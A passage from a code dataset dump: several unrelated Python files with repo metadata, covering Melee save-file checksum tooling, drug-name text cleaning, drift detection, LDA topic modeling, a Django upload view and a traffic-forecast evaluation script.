self.raw_bytes[i]\n res = pack(prev, cursor)\n self.raw_bytes[i] = res\n prev = res\n PREV_BYTE_OFFSET += 0x2000\n BASE_OFFSET += 0x2000\n if (self.packed is False):\n self.packed = True\n\n\nclass melee_snapshot(melee_gci):\n \"\"\" Class representing a snapshot file. \"\"\"\n def get_raw_region_0_checksum(self):\n return self.raw_bytes[0x1e80:0x1e90]\n def get_raw_header_checksum(self):\n return self.raw_bytes[0x1eb0:0x1ec0]\n def get_raw_checksum(self, blknum):\n \"\"\" Return checksum bytes for some block 0-10 \"\"\"\n base_offset = 0x2040\n if (blknum >= 0) and (blknum <= (self.blocksize()-1)):\n target_offset = base_offset + (blknum * 0x2000)\n return self.raw_bytes[target_offset:target_offset + 0x10]\n else:\n return None\n\n def set_raw_region_0_checksum(self, new_checksum):\n self.raw_bytes[0x1e80:0x1e90] = new_checksum\n def set_raw_header_checksum(self, new_checksum):\n self.raw_bytes[0x1eb0:0x1ec0] = new_checksum\n def set_raw_checksum(self, blknum, new_checksum):\n \"\"\" Given some blknum 0-10 and a 0x10-byte bytearray, replace the\n specified checksum bytes with the new bytes \"\"\"\n base_offset = 0x2040\n if (blknum >= 0) and (blknum <= (self.blocksize() -1)):\n target_offset = base_offset + (blknum * 0x2000)\n self.raw_bytes[target_offset:target_offset + 0x10] = new_checksum\n else:\n print(\"[!] Can't set checksum bytes for block {}\".format(blknum))\n exit(-1)\n\n def checksum_region_0(self):\n \"\"\" Compute the header checksum \"\"\"\n base_offset = 0x40\n data_size = 0x1e40\n return self._checksum(base_offset, data_size)\n def checksum_header(self):\n \"\"\" Compute the header checksum \"\"\"\n base_offset = 0x1ec0\n data_size = 0x180\n return self._checksum(base_offset, data_size)\n def checksum_block(self, blknum):\n \"\"\" Given some block number 0-10, compute the checksum for the\n associated data. Returns the raw checksum bytes. \"\"\"\n base_offset = 0x2050\n data_size = 0x1ff0\n if (blknum >= 0) and (blknum <= (self.blocksize() - 1)):\n target_offset = base_offset + (blknum * 0x2000)\n return self._checksum(target_offset, data_size)\n else:\n print(\"[!] Can't compute checksum bytes for block {}\".format(blknum))\n exit(-1)\n\n def recompute_checksums(self):\n \"\"\" Recompute all checksum values and write them back \"\"\"\n if (self.packed is True):\n print(\"[!] You can only recompute checksums on unpacked data\")\n exit(-1)\n\n if (self.get_raw_header_checksum() != self.checksum_header()):\n print(\"[*] Header checksum mismatch, fixing ..\")\n self.set_raw_header_checksum(self.checksum_header())\n else:\n print(\"[*] Header checksum unchanged\")\n\n # Retrieve checksum values for all blocks\n current = []\n for i in range(0, self.blocksize()-1):\n current.append(self.get_raw_checksum(i))\n\n # Compute checksum values for all blocks\n computed = []\n for i in range(0, self.blocksize()-1):\n computed.append(self.checksum_block(i))\n\n # If current checksums don't match, write them back\n for i in range(0, self.blocksize()-1):\n if (current[i] != computed[i]):\n print(\"[*] Block {} checksum mismatch, fixing ..\".format(i))\n self.set_raw_checksum(i, computed[i])\n else:\n print(\"[*] Block {} checksum unchanged\".format(i))\n\n\n def unpack(self):\n \"\"\" Unpack all data \"\"\"\n if (self.packed is False):\n print(\"[!] Data is already unpacked - refusing to unpack\")\n exit(-1)\n print(\"[*] Unpacking GCI data\")\n\n # Unpack the data header region\n PREV_BYTE_OFFSET = 0x1ebf\n BASE_OFFSET = 0x1ec0\n DATA_SIZE = 0x180\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = unpack(prev, cursor)\n self.raw_bytes[i] = res\n prev = cursor\n\n PREV_BYTE_OFFSET = 0x204f\n BASE_OFFSET = 0x2050\n DATA_SIZE = 0x1ff0\n for j in range(0, self.blocksize() - 1):\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = unpack(prev, cursor)\n self.raw_bytes[i] = res\n prev = cursor\n PREV_BYTE_OFFSET += 0x2000\n BASE_OFFSET += 0x2000\n\n if (self.packed is True):\n self.packed = False\n\n\n def pack(self):\n \"\"\" Pack all blocks of data \"\"\"\n if (self.packed is True):\n print(\"[!] Data is already packed -- refusing to pack\")\n exit(-1)\n print(\"[*] Packing GCI data\")\n\n # Pack the data header region\n PREV_BYTE_OFFSET = 0x1ebf\n BASE_OFFSET = 0x1ec0\n DATA_SIZE = 0x180\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = pack(prev, cursor)\n self.raw_bytes[i] = res\n prev = res\n\n PREV_BYTE_OFFSET = 0x204f\n BASE_OFFSET = 0x2050\n DATA_SIZE = 0x1ff0\n for j in range(0, self.blocksize()-1):\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = pack(prev, cursor)\n self.raw_bytes[i] = res\n prev = res\n PREV_BYTE_OFFSET += 0x2000\n BASE_OFFSET += 0x2000\n if (self.packed is False):\n self.packed = True\n\n","repo_name":"eigenform/melee-re","sub_path":"src/meleegci-py/meleegci.py","file_name":"meleegci.py","file_ext":"py","file_size_in_byte":14222,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"92"} +{"seq_id":"32144921517","text":"import unittest\n\nimport zipfile\n\nimport codecs\nimport csv\nfrom csv import writer\n\nfrom csv import reader\n\nfrom zipfile import ZipFile\n\nimport os\n\n#Script test case to test function in the main\n\n#Class to test the Ziplist function in the main\nclass TestZipList(unittest.TestCase):\n\n def test_zip_list(self):\n\n z_read = zipfile.ZipFile(\"zipfile.zip\", \"r\")\n z_write = zipfile.ZipFile(\"zipfile.zip\", \"a\")\n\n for file in z_read.namelist():\n\n print('File:', file)\n\n z_read.namelist()\n\n with z_read.open(file, \"r\") as read_files:\n\n reader = csv.DictReader(codecs.iterdecode(read_files, 'utf-8'))\n\n for line in reader:\n print(line)\n\n with z_write.open('Combined.csv', \"w\") as write:\n\n fieldname = ['Adress', 'Name']\n\n csv_writer = csv.DictWriter(write, fieldnames=fieldname, delimiter='\\t')\n\n csv_writer.writeheader\n\n for line in reader:\n csv_writer.writerow(line)\n\n return line, file\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n unittest.TestCase()\n","repo_name":"Stan5597/Data-Engineering-test-code","sub_path":"TestZipfile.py","file_name":"TestZipfile.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"75019829739","text":"import pandas as pd\nimport unicodedata\nimport regex as re\nimport json\n\ndef jsonl_loader(filename):\n \"\"\"\n trial_file: File with JSONL input\n \"\"\"\n file_io = open(filename)\n json_content = [json.loads(jline) for jline in file_io.read().splitlines()]\n dataframe = pd.DataFrame(json_content)\n return dataframe\n\ndef csv_loader(filename):\n dataframe = pd.read_csv(filename, sep = \",\", quotechar=\"\\\"\")\n return dataframe\n\ndef get_all_drugs_names(dataframe):\n dataframe['alts'] = dataframe.altLabel_list.apply(lambda x: x.split('|'))\n drug_list = []\n\n drug_list = [drug for alt_drugs in dataframe['alts'] for drug in alt_drugs]\n drug_list.extend(dataframe.itemLabel)\n drug_list = list(filter(None, drug_list))\n return drug_list\n\ndef group_drugs_by_first_letter(drug_list):\n drug_dict = {}\n for drug in drug_list:\n try:\n if len(drug) > 1:\n drug_name = preprocess_name(drug)\n if drug_name[0] in drug_dict:\n drug_dict[drug_name[0]].append(drug_name)\n else:\n drug_dict[drug_name[0]] = [drug_name]\n except IndexError:\n pass\n return drug_dict\n\ndef preprocess_name(drug_name):\n parentheses_trans = str.maketrans({\"(\":None, \")\":None, \"{\":None, \"}\":None, \"[\":None, \"]\":None, \"/\":\" \", \"\\\\\":\" \"})\n drug_name = remove_accented_chars(drug_name)\n drug_name = drug_name.translate(parentheses_trans)\n drug_name = drug_name.lower().rstrip().lstrip()\n return drug_name\n\ndef get_multiple_names(drug_name):\n drug_names = []\n drug_name = drug_name.split('+')\n for drug in drug_name:\n drug = drug.split('and')\n if len(drug) > 1:\n drug_names.extend(drug)\n return drug_names\n\ndef remove_accented_chars(drug_name):\n drug_name = unicodedata.normalize('NFKD', drug_name).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n return drug_name\n\ndef create_drug_references(dataframe):\n drug_ref = {}\n dataframe['alts'] = dataframe.altLabel_list.apply(lambda x: x.split('|'))\n drug_ref_df = dataframe[[\"itemLabel\", \"alts\"]]\n for idx, row in drug_ref_df.iterrows():\n for val in row.alts:\n val = preprocess_name(val)\n label = preprocess_name(row.itemLabel)\n drug_ref[val] = label\n drug_ref[label] = label\n return drug_ref\n ","repo_name":"jh2048/clinical_trials","sub_path":"scripts/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12328775500","text":"from django.core.files.uploadedfile import UploadedFile\nfrom django.shortcuts import render\nfrom django.utils.text import slugify\n\nfrom .forms import UploadForm\nfrom .models import Document, WordResult\n\n\ndef handle_upload(f: UploadedFile): # pragma: no cover\n \"\"\"Store uploaded file as a document. Existing documents (determined by filename) are overwritten.\n Non-text files are rejected.\"\"\"\n\n if f.content_type != \"text/plain\":\n raise NotImplementedError(\n f\"Filetype not handled. Please upload a text/plain file.\"\n )\n\n name = slugify(f.name.replace(\".txt\", \"\"))\n content = f.read().decode(\n \"utf-8\"\n ) # we assume small files, so we don't use f.chunk()\n\n existing_queryset = Document.objects.filter(name__exact=name)\n\n # create new document, or overwrite existing one\n if len(existing_queryset) == 0:\n document = Document(name=name, full_text=content)\n else:\n document = existing_queryset[0]\n document.full_text = content\n\n document.save()\n\n # process document\n try:\n document.ingest()\n except LookupError:\n raise LookupError(\n \"LookupError while running ingest function. Did you run initwordy before starting the site?\"\n )\n\n\ndef index(request): # pragma: no cover\n \"\"\"On GET, generate app form and results. On POST, process the uploaded text file.\"\"\"\n\n if request.method == \"POST\":\n form = UploadForm(request.POST, request.FILES)\n if form.is_valid():\n handle_upload(request.FILES[\"document_file\"])\n\n form = UploadForm() # reset form\n words_by_frequency = WordResult.get_words_by_frequency()\n context = {\"form\": form, \"word_by_frequency\": words_by_frequency}\n\n return render(request, \"wordy/index.html\", context)\n","repo_name":"lofidevops/simplenlp","sub_path":"wordy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31222442507","text":"\"\"\"\nDrift Detection Method\nGama et al.\n\"\"\"\nfrom ._base_drift import BaseDrift\nimport numpy as np\n\nclass DDM(BaseDrift):\n def __init__(self, warning_level=2.0, alarm_level=3.0, min_n_errors = 30) -> None:\n super().__init__()\n self.warning_level = warning_level\n self.alarm_level = alarm_level\n self.min_n_errors = min_n_errors\n \n # Highest\n self.min_std = np.inf\n self.min_error = np.inf\n self.min_std_error = np.inf\n \n self.error_prob = 1\n self.error_std = 0\n self.error_prob_std = 0\n\n # [DEBUG]\n self.errors = []\n\n def _apply(self):\n if self.n < self.min_n_errors:\n return False\n # Go over elements in window and compute probs\n for e in self.window:\n self.error_prob += (e-self.error_prob)/self.n\n self.error_std = np.sqrt(self.error_prob*(1-self.error_prob)/self.n)\n \n # [DEBUG]\n self.errors.append(self.error_prob)\n \n # Clear window\n self.window = []\n \n if (self.error_prob+self.error_std) < self.min_std_error:\n self.min_error = self.error_prob\n self.min_std = self.error_std\n self.min_std_error = self.min_error+self.min_std\n \n if self.error_prob+self.error_std > self.min_error + self.alarm_level*self.min_std:\n self._drift_alarm = True\n self.reset()\n elif self.error_prob+self.error_std > self.min_error + self.warning_level*self.min_std:\n self._drift_warning = True\n \n def reset(self):\n self.min_std = np.inf\n self.min_error = np.inf\n self.min_std_error = np.inf\n self.n = 0\n\nif __name__ == \"__main__\":\n from matplotlib import pyplot as plt\n r1 = np.random.binomial(1,0.3,1000)\n r2 = np.random.binomial(1,0.7,1000)\n r = np.concatenate((r1,r2))\n \n dd = DDM()\n for i,x in enumerate(r):\n dd.add_element(x)\n if dd.drift_alarm:\n print(f'drift alarm {i}')\n \n plt.plot(dd.errors)\n plt.show()\n","repo_name":"charliehpearce/drift-lib","sub_path":"drift_detection/_DDM.py","file_name":"_DDM.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40395474317","text":"import os\r\nimport re\r\nfrom datetime import datetime\r\nimport json\r\nimport pandas as pd\r\nimport tomotopy as tp\r\nimport spacy\r\nimport numpy as np\r\n\r\n\r\ndef cleaning_docs(df, docs_file):\r\n\r\n docs_d = {} # dictionary of documents to perform topic modeling on, here documents are posts' clean sentences\r\n stopwords = set([line.strip() for line in open(\"stoplist_final.txt\")]) # creating list of stop words\r\n nlp = spacy.load(\"en_core_web_sm\") # loading the spacy language model\r\n lemmatizer = nlp.get_pipe(\"lemmatizer\") # getting the spacy lemmatizer\r\n\r\n for index, row in df.iterrows(): # iterating over posts\r\n post_id = row['concat_id'] # id of the post, e.g. 'Endo_xyz'\r\n post = row['selftext'] # textual content of the post\r\n post_url = row['url'] # url of the post\r\n doc = nlp(post) # processing the post: tokenizing and lemmatizing\r\n sent_n = 0 # counter of sentences in the post\r\n for sent in doc.sents:\r\n sent_id = f'{post_id}_{sent_n}' # creating an id for each post' sentence\r\n sent_n += 1\r\n clean_sent = [] # sentences represented as list of lemmatized tokens\r\n for token in sent:\r\n lemma = token.lemma_\r\n clean_lemma = re.sub(r'[^\\w\\s\\d]', '', lemma) # remove punctuation from tokens\r\n clean_lemma = re.sub(r'[\\n+\\s+]', '', clean_lemma) # remove empty spaces and new lines\r\n if clean_lemma and clean_lemma not in stopwords: # remove empty tokens/stopwords\r\n clean_sent.append(clean_lemma) # adding clean lemma to the clean sentence's list\r\n if len(clean_sent) > 4: # exclude sentences that are less than 5 words\r\n # add sentence id and clean sentence, og sentence, url to the dictionary as a key,value pair\r\n # the clean - tokenized and lemmatized - sentences are our documents\r\n docs_d[sent_id] = [clean_sent, sent.text, post_url]\r\n\r\n with open(docs_file, 'w') as jsonfile: # creating a file with the dict of documents to topic model\r\n json.dump(docs_d, jsonfile)\r\n\r\n return docs_d\r\n\r\n\r\ndef perform_tm(s_ids, corpus, n_topics, rm_top, topwords_file):\r\n\r\n # setting and loading the LDA model\r\n lda_model = tp.LDAModel(k=n_topics, # number of topics in the model\r\n min_df=3, # remove words that occur in less than n documents\r\n rm_top=rm_top) # remove n most frequent words\r\n vocab = set()\r\n for doc in corpus:\r\n lda_model.add_doc(doc) # adding document to the model\r\n vocab.update(doc) # adding tokens in the document to the vocabulary\r\n print('Num docs:{}'.format(len(lda_model.docs)))\r\n print(\"Vocabulary Size: {}\".format(len(list(vocab))))\r\n print('Removed Top words: ', lda_model.removed_top_words)\r\n\r\n iterations = 10\r\n for i in range(0, 100, iterations): # train model 10 times with 10 iterations at each training = 100 iterations\r\n lda_model.train(iterations)\r\n print(f'Iteration: {i}\\tLog-likelihood: {lda_model.ll_per_word}')\r\n\r\n #TOP WORDS\r\n num_top_words = 10 # number of top words to print for each topic\r\n with open(topwords_file, \"w\", encoding=\"utf-8\") as file:\r\n file.write(f\"\\nTopics in LDA model: {n_topics} topics {rm_top} removed top words\\n\\n\") # write settings of the model in file\r\n topic_individual_words = []\r\n for topic_number in range(0, n_topics): # for each topic number in the total number of topics\r\n topic_words = ' '.join( # string of top words in the topic\r\n word for word, prob in lda_model.get_topic_words(topic_id=topic_number, top_n=num_top_words)) # get_topic_words is a tomotopy function that returns a dict of words and their probabilities\r\n topic_individual_words.append(topic_words.split(' ')) # append list of the topic's top words for later\r\n file.write(f\"Topic {topic_number}\\n{topic_words}\\n\\n\") # write topic number and top words in file\r\n print(topic_individual_words)\r\n\r\n #TOPIC DISTRIBUTIONS\r\n topic_distributions = [list(doc.get_topic_dist()) for doc in lda_model.docs] # list of lists of topic distributions for each document, get_topic_dist() is a tomotopy function\r\n topic_results = []\r\n for topic_distribution in topic_distributions: # list of dicts of documents' topic distributions to convert into pandas' dataframe\r\n topic_results.append({'topic_distribution': topic_distribution})\r\n df = pd.DataFrame(topic_results, index=s_ids) # df where each row is the list of topic distributions of a document, s_ids are the ids of the sentences\r\n column_names = [f\"Topic {number} {' '.join(topic[:4])}\" for number, topic in enumerate(topic_individual_words)] # create list of column names from topic numbers and top words\r\n df[column_names] = pd.DataFrame(df['topic_distribution'].tolist(), index=df.index) # df where topic distributions are not in a list and match the list of column names\r\n df = df.drop('topic_distribution', axis='columns') # drop old topic distributions' column\r\n dominant_topic = np.argmax(df.values, axis=1) # get dominant topic for each document\r\n df['dominant_topic'] = dominant_topic # add column for the dominant topic in the document\r\n\r\n return df\r\n\r\n\r\ndef main(subreddit):\r\n\r\n reddit_df = pd.read_csv(os.path.join('data', f'{subreddit}.csv')) # path of csv with reddit data\r\n tomo_folder = os.path.join('output', 'topic_modeling') # results' folder\r\n if not os.path.exists(tomo_folder): # create folder if it doesn't exist\r\n os.makedirs(tomo_folder)\r\n\r\n clean_docs_file = os.path.join(tomo_folder, f'{subreddit}.json') # file with clean documents - here, post sentences\r\n if not os.path.exists(clean_docs_file): # if clean documents file doesn't exist, executes data cleaning\r\n start = datetime.now()\r\n print(\"Data Cleaning...\")\r\n docs_dict = cleaning_docs(reddit_df, clean_docs_file)\r\n print(f'{str(datetime.now())}________________{str(datetime.now() - start)}\\n') # print timing of data cleaning\r\n else:\r\n with open(clean_docs_file) as json_file:\r\n docs_dict = json.load(json_file)\r\n doc_ids = [doc_id for doc_id in docs_dict.keys()] # get list of document ids for later\r\n clean_docs = [sent_url[0] for sent_url in docs_dict.values()] # get list of clean documents for later\r\n og_docs = [[sent_url[1]] for sent_url in docs_dict.values()] # get list of original documents for later\r\n #doc_urls = [sent_url[2] for sent_url in docs_dict.values()] # get list of document urls for later\r\n\r\n for num_topics in [7, 10, 15]: # for number of topics - for loops allow to run multiple models with different settings with one execution\r\n for rm_frequent in [15]: # for number of most frequent words to remove\r\n\r\n txt_topwords = os.path.join(tomo_folder, f'{subreddit}-{num_topics}_{rm_frequent}.txt') # path for top words file\r\n csv_dtm = os.path.join(tomo_folder, f'{subreddit}-{num_topics}_{rm_frequent}.csv') # path for doc-topic matrix file\r\n\r\n if not os.path.exists(txt_topwords) or not os.path.exists(csv_dtm): # if result files don't exist, performs topic modeling\r\n start = datetime.now()\r\n print(\"Performing Topic Modeling...\")\r\n lda_dtm = perform_tm(doc_ids, clean_docs, num_topics, rm_frequent, txt_topwords)\r\n lda_dtm['sent'] = og_docs # add original sentences to doc-topic df\r\n #lda_dtm['post_url'] = doc_urls # add urls of the posts of the sentences to matrix\r\n lda_dtm.to_csv(csv_dtm) # convert doc-topic df in csv file\r\n print(f'{str(datetime.now())}____Topic modeling {num_topics}, {rm_frequent} time:____{str(datetime.now() - start)}\\n') # print timing of topic modeling\r\n\r\n\r\nif __name__ == '__main__':\r\n main('endo+endometriosis') # name of the subreddit file\r\n","repo_name":"federicabologna/endometriosis","sub_path":"topic_modeling.py","file_name":"topic_modeling.py","file_ext":"py","file_size_in_byte":8030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"23062378533","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 02 16:55:22 2018\n\n@author: Daniel\n\"\"\"\nimport pandas as pd\nimport seaborn as sns\nimport os as os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndegree_sign= u'\\N{DEGREE SIGN}'\nimport matplotlib\nmatplotlib.rcParams['mathtext.fontset'] = 'custom'\nmatplotlib.rcParams['mathtext.rm'] = 'Bitstream Vera Sans'\nmatplotlib.rcParams['mathtext.it'] = 'Bitstream Vera Sans:italic'\nmatplotlib.rcParams['mathtext.bf'] = 'Bitstream Vera Sans:bold'\n\n\n\n\n\n#Change directory to folder containing rates.csv file\nindir='C:\\\\Users\\\\Daniel\\\\Documents\\\\farmscripts\\\\Stuff for mark\\\\'\nrates = pd.read_csv(indir+'rates.csv')\n\nrates1 = rates[rates['experiment']==1]\n\nrates1['J+Tot']=rates1['J']+rates1['J+']\nrates1['J-Tot']=rates1['J']-rates1['J-']\n\nrates1['logJ']=rates1['J'].apply(np.log10)\nrates1['logJ+']= rates1['J+Tot'].apply(np.log10)-rates1['logJ']\nrates1['logJ-']=rates1['logJ']-rates1['J-Tot'].apply(np.log10)\nyerr=(rates1['logJ+'], rates1['logJ-'])\n\n\nrates3 = rates[rates['experiment']==3]\n\nrates3['J+Tot']=rates3['J']+rates3['J+']\nrates3['J-Tot']=rates3['J']-rates3['J-']\n\nrates3['logJ']=rates3['J'].apply(np.log10)\nrates3['logJ+']= rates3['J+Tot'].apply(np.log10)-rates3['logJ']\nrates3['logJ-']=rates3['logJ']-rates3['J-Tot'].apply(np.log10)\nyerr3=(rates3['logJ+'], rates3['logJ-'])\n\n\nfig, ax1 = plt.subplots()\nax1.errorbar(x= rates3['T'], y=rates3['logJ'], xerr = 0.4, yerr=yerr3,fmt='o', \n ecolor = 'b', lw=0.5, label = 'exp. 3' )\nsns.regplot(x=\"T\", y=\"logJ\", data=rates3, ax = ax1, color = 'b', ci= None)\n\n\nax1.errorbar(x= rates1['T'], y=rates1['logJ'], xerr = 0.4, yerr=yerr,fmt='o', ecolor = 'r',\n markerfacecolor = 'r', mec='r', lw=0.5, label = 'exp. 1')\nsns.regplot(x=\"T\", y=\"logJ\", data=rates1, ax = ax1, color = 'r', ci= None)\nax1.set_xlabel ('Temperature ('+degree_sign+'C)')\nax1.set_ylabel(r'$\\mathrm{Log_{10} \\enspace J \\enspace (cm^{-2})}$' )\nplt.legend()\n\n\n","repo_name":"danielosullivan2007/Farmscripts","sub_path":"formark.py","file_name":"formark.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"8525290352","text":"class Problem:\n def __init__(self, value_coefficient, weight_penalty, count_penalty, population_size):\n self.value_coefficient = value_coefficient\n self.weight_penalty = weight_penalty\n self.count_penalty = count_penalty\n self.population_size = population_size\n\n self.weights = []\n self.max_weight = 0\n self.values = []\n self.individual_size = 0\n self.minimum_objects = 0\n self.maximum_objects = 0\n\n def load_file(self, filename):\n with open(filename, 'r') as file:\n self.max_weight = int(file.readline())\n self.minimum_objects = int(file.readline())\n self.maximum_objects = int(file.readline())\n self.individual_size = int(file.readline())\n\n self.weights = list(map(int, file.readline().split(' ')))\n self.values = list(map(int, file.readline().split(' ')))\n","repo_name":"andrei-i-gavrila/JewelryExhibitionEA","sub_path":"ea/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18566134991","text":"import torch\nimport util\nimport argparse\nfrom model import *\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nfrom engine import trainer\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--device',type=str,default='cuda:0',help='')\nparser.add_argument('--data',type=str,default='data/METR-LA',help='data path')\nparser.add_argument('--data_id',type=str,default='METR-LA',help='data path')\nparser.add_argument('--adjdata',type=str,default='data/sensor_graph/adj_mx.pkl',help='adj data path')\nparser.add_argument('--adjtype',type=str,default='doubletransition',help='adj type')\nparser.add_argument('--gcn_bool',action='store_true',help='whether to add graph convolution layer')\nparser.add_argument('--aptonly',action='store_true',help='whether only adaptive adj')\nparser.add_argument('--addaptadj',action='store_true',help='whether add adaptive adj')\nparser.add_argument('--randomadj',action='store_true',help='whether random initialize adaptive adj')\nparser.add_argument('--seq_length',type=int,default=12,help='')\nparser.add_argument('--nhid',type=int,default=32,help='')\nparser.add_argument('--in_dim',type=int,default=2,help='inputs dimension')\nparser.add_argument('--num_nodes',type=int,default=207,help='number of nodes')\nparser.add_argument('--batch_size',type=int,default=64,help='batch size')\nparser.add_argument('--learning_rate',type=float,default=0.001,help='learning rate')\nparser.add_argument('--dropout',type=float,default=0.3,help='dropout rate')\nparser.add_argument('--weight_decay',type=float,default=0.0001,help='weight decay rate')\nparser.add_argument('--checkpoint',type=str,help='')\nparser.add_argument('--plotheatmap',type=str,default='True',help='')\n\n# EMA\nparser.add_argument('--use_ema', action='store_true')\nparser.add_argument('--epsilon', type=float, default=0.001)\nparser.add_argument('--moving_average_decay', type=float, default=0.99)\nparser.add_argument('--standing_steps', type=int, default=100)\nparser.add_argument('--start_iter', type=int, default=300)\nparser.add_argument('--ema_loss', type=str, default='BDFMSE', choices=['DFMSE', 'BDFMSE', 'TDFMSE', 'PDFMSE', 'CSMSE'])\nparser.add_argument('--ema_eval_model', type=str, default='target', choices=['source', 'target'])\n\nargs = parser.parse_args()\n\n# exp id\nargs.exp_id = \"id_\"\nargs.exp_id += \"data_\" + str(args.data_id) + \"_\"\nargs.exp_id += \"ema_\" + str(args.use_ema) + \"_\"\nargs.exp_id += \"eps_\" + str(args.epsilon) + \"_\"\nargs.exp_id += \"mad_\" + str(args.moving_average_decay) + \"_\"\nargs.exp_id += \"sit_\" + str(args.start_iter) + \"_\"\nargs.exp_id += \"lr_\" + str(args.learning_rate) + \"_\"\n#args.exp_id += \"lr_\" + str(args.learning_rate)\n\nprint(args.exp_id)\n\n# checkpoints, outputs\nif args.use_ema:\n os.makedirs(os.path.join(\"outputs\", args.data_id, \"wavebound\", args.exp_id, \"epoch\"), exist_ok=True)\n args.output_dir = os.path.join(\"outputs\", args.data_id, \"wavebound\")\n args.checkpoint_dir = os.path.join(\"checkpoints\", args.data_id, \"wavebound\")\nelse:\n os.makedirs(os.path.join(\"outputs\", args.data_id, \"origin\", args.exp_id, \"epoch\"), exist_ok=True)\n args.output_dir = os.path.join(\"outputs\", args.data_id, \"origin\")\n args.checkpoint_dir = os.path.join(\"checkpoints\", args.data_id, \"origin\")\n\n\ndef main():\n device = torch.device(args.device)\n _, _, adj_mx = util.load_adj(args.adjdata,args.adjtype)\n dataloader = util.load_dataset(args.data, args.batch_size, args.batch_size, args.batch_size)\n scaler = dataloader['scaler']\n supports = [torch.tensor(i).to(device) for i in adj_mx]\n\n print(args)\n\n if args.randomadj:\n adjinit = None\n else:\n adjinit = supports[0]\n\n if args.aptonly:\n supports = None\n\n # testing\n print(\"Testing\")\n eval_path = os.path.join(args.checkpoint_dir, args.exp_id, \"epoch\", \"best.pth\") if not args.use_ema \\\n else os.path.join(args.checkpoint_dir, \"target\", args.exp_id, \"epoch\", \"best.pth\")\n engine = trainer(scaler, args.in_dim, args.seq_length, args.num_nodes, args.nhid, args.dropout,\n args.learning_rate, args.weight_decay, device, supports, args.gcn_bool, args.addaptadj,\n adjinit, args)\n\n engine.eval_model.load_state_dict(torch.load(eval_path))\n engine.eval_model.eval()\n\n print('model load successfully')\n\n outputs = []\n realy = torch.Tensor(dataloader['y_test']).to(device)\n realy = realy.transpose(1,3)[:,0,:,:]\n\n for iter, (x, y) in enumerate(dataloader['test_loader'].get_iterator()):\n testx = torch.Tensor(x).to(device)\n testx = testx.transpose(1,3)\n with torch.no_grad():\n preds = engine.eval_model(testx).transpose(1,3)\n outputs.append(preds.squeeze())\n\n yhat = torch.cat(outputs,dim=0)\n yhat = yhat[:realy.size(0),...]\n\n\n\n\n amae = []\n amape = []\n armse = []\n for i in range(12):\n pred = scaler.inverse_transform(yhat[:,:,i])\n real = realy[:,:,i]\n metrics = util.metric(pred,real)\n log = 'Evaluate best model on test data for horizon {:d}, Test MAE: {:.4f}, Test MAPE: {:.4f}, Test RMSE: {:.4f}'\n print(log.format(i+1, metrics[0], metrics[1], metrics[2]))\n amae.append(metrics[0])\n amape.append(metrics[1])\n armse.append(metrics[2])\n\n log = 'On average over 12 horizons, Test MAE: {:.4f}, Test MAPE: {:.4f}, Test RMSE: {:.4f}'\n print(log.format(np.mean(amae),np.mean(amape),np.mean(armse)))\n\n # save output as np\n print(f\"save output as numpy... {os.path.join(args.output_dir, args.exp_id, 'epoch')}\")\n\n outp = scaler.inverse_transform(yhat)\n outp = outp.cpu().numpy()\n realy = realy.cpu().numpy()\n with open(os.path.join(args.output_dir, args.exp_id, 'epoch', 'true.npy'), 'wb') as f:\n np.save(f, realy)\n with open(os.path.join(args.output_dir, args.exp_id, 'epoch', 'pred.npy'), 'wb') as f:\n np.save(f, outp)\n print(\"done.\")\n\n '''\n Heatmaps\n if args.plotheatmap == \"True\":\n adp = F.softmax(F.relu(torch.mm(model.nodevec1, model.nodevec2)), dim=1)\n device = torch.device('cpu')\n adp.to(device)\n adp = adp.cpu().detach().numpy()\n adp = adp*(1/np.max(adp))\n df = pd.DataFrame(adp)\n sns.heatmap(df, cmap=\"RdYlBu\")\n plt.savefig(\"./emb\"+ '.pdf')\n\n y12 = realy[:,99,11].cpu().detach().numpy()\n yhat12 = scaler.inverse_transform(yhat[:,99,11]).cpu().detach().numpy()\n\n y3 = realy[:,99,2].cpu().detach().numpy()\n yhat3 = scaler.inverse_transform(yhat[:,99,2]).cpu().detach().numpy()\n\n df2 = pd.DataFrame({'real12':y12,'pred12':yhat12, 'real3': y3, 'pred3':yhat3})\n df2.to_csv('./wave.csv',index=False)\n\n '''\n\n\nif __name__ == \"__main__\":\n 